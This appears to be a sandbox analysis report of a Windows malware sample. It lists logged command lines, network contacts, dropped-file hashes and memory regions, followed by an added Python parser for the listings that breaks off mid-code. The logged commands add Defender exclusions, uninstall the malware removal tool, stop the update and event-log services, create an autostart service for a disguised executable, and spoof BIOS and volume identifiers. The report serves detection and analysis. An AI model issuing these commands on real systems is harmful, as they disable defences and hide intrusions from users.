C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613766HP-TRGT11225FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313766HP-TRGT11225DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713766HP-TRGT11225MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\en-US\conhost.exe

"C:\Windows\en-US\conhost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13786HP-TRGT10179AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213786HP-TRGT10179RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 813786HP-TRGT10179SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 513786HP-TRGT10179SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 413786HP-TRGT10179FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 613786HP-TRGT10179FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 313786HP-TRGT10179DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 713786HP-TRGT10179MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9STD-728M

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: L3HH-BOM7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: LCAU-R7JM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: MIMF-CKII

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: IDOC-5UBC

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: OK55-44IB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: 1V8C-OFFM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: ES01-2ISC

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH6

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: DG7N-0PH6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 4OPL-NR0L

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: AIU0-JR6C

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: K4SE-OBJ5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: ITOB-656E

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: ELPA-BVHJ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF6

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TUUN-ZIF6

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R8

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 3IFZ-F8R8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: I3BO-LVNZ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E850

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 6IR5-E850

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 7JH1-CGH2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ7

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 6PP0-BHZ7

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L181

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: KUMP-L181

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: BUED-JILZ

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: NRC2-CPJG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat

Network

Country Destination Domain Proto
US 8.8.8.8:53 bookreading2024.net udp
US 104.21.61.25:443 bookreading2024.net tcp
US 8.8.8.8:53 25.61.21.104.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
IT 185.196.11.122:80 185.196.11.122 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
RU 147.45.44.3:80 147.45.44.3 tcp
US 8.8.8.8:53 122.11.196.185.in-addr.arpa udp
US 8.8.8.8:53 3.44.45.147.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
RU 147.45.44.3:80 147.45.44.3 tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

memory/1572-0-0x00000000000F0000-0x000000000011C000-memory.dmp

memory/1572-1-0x00007FFFBA0D3000-0x00007FFFBA0D5000-memory.dmp

memory/1572-2-0x00000000008C0000-0x00000000008C6000-memory.dmp

memory/1572-3-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/1572-5-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgayrlwq.fgu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4708-6-0x0000022FA3E90000-0x0000022FA3EB2000-memory.dmp

memory/4708-16-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/4708-17-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

memory/4708-18-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

MD5 280f228a0fd9232c72c66646f5ac8f27
SHA1 f6ed9a02fe24afa92b832efb95d4c140f1f9855a
SHA256 6aace057c548df95831b928aab373130bc09f5636fb7fff52372b4280f2ffe51
SHA512 5e919970667464332083dc40152bcb81f96524c35776d0f945244358885253ab2af1ed9b8db52cb22c60730db95dce34615c7df406c6cd6ae8c5fef3a388af6e

C:\Users\Admin\AppData\Roaming\conhostsft.exe

MD5 975eca3793d5ec51d4bd4041fe4bd595
SHA1 f3b36aad3566d36a81cb8ab11c49e28b8fbb807e
SHA256 50a29176f61d2567c67f234d46e2815d0fac1ccd4a6f7577a47133543bff67c3
SHA512 af6f4f07bf32b5aae8b2f21b5d8a8a84cb6e72c73745019729240fb2d94d0b45713a05130dbc1feda2543009705e13f915106a168828d624845b20f6fd7f6c89

memory/4708-44-0x00007FFFBA0D0000-0x00007FFFBAB91000-memory.dmp

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

MD5 81a45f1a91448313b76d2e6d5308aa7a
SHA1 0d615343d5de03da03bce52e11b233093b404083
SHA256 fb0d02ea26bb1e5df5a07147931caf1ae3d7d1d9b4d83f168b678e7f3a1c0ecd
SHA512 675662f84dfcbf33311f5830db70bff50b6e8a34a4a926de6369c446ea2b1cf8a63e9c94e5a5c2e1d226248f0361a1698448f82118ac4de5a92b64d8fdf8815d

C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe

MD5 bb93bfa99237b0efc8e476af92d2882c
SHA1 aa3285a0166dc7efe30a9156ea0d98af9f83651a
SHA256 92820ca93b03d8c98ffeee165a92b6fa536abd34c97bb692b51e70f6f74dbeb0
SHA512 40d8867fe2335315bd8de9da2571a0ba22e7760e5a6a9743a3aa611113406c0e4fc7f5b25986a18e58feb3e7e510923dc6320ae44fdce9ea02a467b3cab6ac70

C:\ProgramData\Microsoft\Windows\Disk.bat

MD5 250e75ba9aac6e2e9349bdebc5ef104e
SHA1 7efdaef5ec1752e7e29d8cc4641615d14ac1855f
SHA256 7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516
SHA512 7f0d7d41c9eafcd65daa674b5182cf52e11aa0f6d6baaee74fe4c4ffc08a163277c4981cd123af0cb1857ae6fd223b5e8c676d9dc5c646a870fbd9bc4001c438

C:\ProgramData\Microsoft\Windows\DevManView.exe

MD5 33d7a84f8ef67fd005f37142232ae97e
SHA1 1f560717d8038221c9b161716affb7cd6b14056e
SHA256 a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512 c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

C:\ProgramData\Microsoft\Windows\DevManView.cfg

MD5 43b37d0f48bad1537a4de59ffda50ffe
SHA1 48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8
SHA256 fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288
SHA512 cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat

MD5 62a4289ada4d67fedd4d54ba96b5b228
SHA1 c60573ddfd05111be1adf47d28cd04ecadd5eaef
SHA256 6c4f31567a23e66fb38e0d495d8a0c2d4284d03ce58d3a45e7964a3f68035d50
SHA512 d609dd9179a243fe2f89559276bd424490045e80d112f63c63b20271f1f63c0ad2d89bf256e2c0dfba29c37e2ba34bb7067e02388aa1490e22fc13660473d64a

C:\ChainReview\sphyperRuntimedhcpSvc.exe

MD5 93457a02f578affc1800d7528c5370f3
SHA1 fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256 ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA512 4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

memory/3556-100-0x0000000000AE0000-0x0000000000CE4000-memory.dmp

memory/3556-105-0x00000000013C0000-0x00000000013CE000-memory.dmp

memory/3556-107-0x000000001B910000-0x000000001B92C000-memory.dmp

memory/3556-108-0x000000001BBD0000-0x000000001BC20000-memory.dmp

memory/3556-110-0x000000001B930000-0x000000001B948000-memory.dmp

memory/3556-112-0x000000001B8F0000-0x000000001B8FE000-memory.dmp

memory/3556-114-0x000000001B900000-0x000000001B90E000-memory.dmp

memory/3556-116-0x000000001B950000-0x000000001B95C000-memory.dmp

memory/3556-118-0x000000001B960000-0x000000001B96E000-memory.dmp

memory/3556-120-0x000000001BB80000-0x000000001BB8C000-memory.dmp

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7dd8e4f2517f6deec77fba323ac37f81
SHA1 e264fb735ddbf68945de4aa62f378fb262fea889
SHA256 9ba62fdde3544a604a0ea671bcd5cf62ced3439a1d02d5069ae8b6b5c8652ea6
SHA512 b638efaf087717eca0da414824741291a2043e254ade639182c21d35f23e3c24abffb79b43f42fb0fbe5a78aa5b357a4e6f64e4e7e8ef511143a2565bb86185e

C:\Users\Admin\AppData\Local\Temp\KnrOHCCDDZ.bat

MD5 2a9979c4257d7e16e538c8580c70646f
SHA1 8b401fb93cb8c8071ecbf2d19c9cb37abe8487fc
SHA256 7d5e9bf45fe1cd70114a1efe3beab62a0555e23c23cb17e30edd0b59cc9491f2
SHA512 cce51043daa2c44b129a60b85f9a5490c04239e7367e8bddebd67fe8824cf4ac729a18e9103b762bce050b711d3aa88614654282b0b619cd797c6be81b7ffd17

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0fd3f36f28a947bdd05f1e05acf24489
SHA1 cf12e091a80740df2201c5b47049dd231c530ad3
SHA256 d36c21211f297a74a801881707690fa7a0a0a31addd3c7ba1522275b8848ab50
SHA512 5f132308b06e621aace1091f523649bcb5d1823b478691799791f4154cb96b9897f563eed8ad8db4a03714d815246479372e0920c659eb3fd9006271e58429ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa6672b47c4b32de047db3b0204c8cb6
SHA1 fbc33cb99b0dcdde36ba0c1a02af808970b671d9
SHA256 f5aa3390c32750a43f2ab55f035c5eff175e3c27f85b35adb524262443a672b6
SHA512 b2057a17cdfe8401f57cf255e360d71b0e6b6699c6308486e8ae5e33459fecba32a3d6758c2fa756a0064346c90b3ac5a0016f1a1220a2d5faaec0cbce1eb83d

memory/3780-257-0x000002B32F050000-0x000002B32F06C000-memory.dmp

memory/3780-258-0x000002B32F070000-0x000002B32F125000-memory.dmp

memory/3780-259-0x000002B32F130000-0x000002B32F13A000-memory.dmp

memory/3780-260-0x000002B32F2A0000-0x000002B32F2BC000-memory.dmp

memory/3780-261-0x000002B32F280000-0x000002B32F28A000-memory.dmp

memory/3780-262-0x000002B32F2E0000-0x000002B32F2FA000-memory.dmp

memory/3780-263-0x000002B32F290000-0x000002B32F298000-memory.dmp

memory/3780-264-0x000002B32F2C0000-0x000002B32F2C6000-memory.dmp

memory/3780-265-0x000002B32F2D0000-0x000002B32F2DA000-memory.dmp

memory/2368-272-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-271-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-274-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-269-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-268-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2368-270-0x0000000140000000-0x000000014000E000-memory.dmp
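The listing above is flat text: each dropped file is a path line followed by its MD5/SHA1/SHA256/SHA512 lines, interleaved with memory/&lt;pid&gt;-&lt;n&gt;-&lt;start&gt;-&lt;end&gt;-memory.dmp entries for dumped regions, and the Network rows are country, destination, queried name and protocol. The Python below is an added example, not part of the original report or of the sandbox's own tooling: it parses both listings into records, checks that every digest has the length its algorithm requires, turns in-addr.arpa PTR names back into the IPv4 addresses they ask about (so the lookup of 3.44.45.147.in-addr.arpa is matched to the direct TCP connection to 147.45.44.3), and flags files worth a second look, such as the kernel driver amifldrv64.sys written next to AMIDEWINx64.exe (the AMI DMI editing utility and the driver it ships with). The sample input is a few entries copied from this section; the flagging rules are the example's own heuristics, not the sandbox's signatures.

```python
"""Parse the flat Files / Network listings of this report format into IOC records."""
import ipaddress
import re
from dataclasses import dataclass, field

# Constructed sample input: rows copied from the listing in this section.
SAMPLE_NETWORK = """\
US 8.8.8.8:53 3.44.45.147.in-addr.arpa udp
RU 147.45.44.3:80 147.45.44.3 tcp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp
"""

SAMPLE_FILES = r"""
memory/1572-0-0x00000000000F0000-0x000000000011C000-memory.dmp

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

MD5 dd1313842898ffaf72d79df643637ded
SHA1 93a34cb05fdf76869769af09a22711deea44ed28
SHA256 81b27a565d2eb4701c404e03398a4bca48480e592460121bf8ec62c5f4b061df
SHA512 db8cdcbfca205e64f1838fc28ea98107c854a4f31f617914e45c25d37da731b876afc36f816a78839d7b48b3c2b90f81856c821818f27239a504ab4253fe28f9

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
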